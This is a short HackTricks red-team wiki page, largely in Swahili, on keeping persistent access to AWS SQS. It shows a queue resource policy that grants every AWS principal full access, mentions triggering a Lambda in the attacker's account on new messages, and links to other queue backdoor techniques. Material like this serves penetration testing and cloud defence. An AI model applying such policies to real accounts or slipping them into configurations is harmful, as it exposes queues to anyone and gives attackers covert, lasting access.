AWS - SQS Persistence

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

SQS

Kwa maelezo zaidi angalia:

AWS - SQS Enum

Kutumia sera ya rasilimali

Katika SQS unahitaji kuonyesha kwa sera ya IAM nani ana ruhusa ya kusoma na kuandika. Inawezekana kuonyesha akaunti za nje, ARN za roles, au hata "*".
Sera ifuatayo inampa kila mtu ndani ya AWS ufikiaji kwa kila kitu katika foleni iitwayo MyTestQueue:

json
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__owner_statement",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": ["SQS:*"],
"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
}
]
}

note

Unaweza hata kuamsha Lambda kwenye akaunti ya mshambuliaji kila wakati ujumbe mpya unaowekwa kwenye queue (utalazimika kuire-put). Kwa hili fuata maelekezo haya: https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html

Mbinu Zaidi za SQS Persistence Techniques

AWS - SQS DLQ Backdoor Persistence via RedrivePolicy/RedriveAllowPolicy

AWS - SQS OrgID Policy Backdoor

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks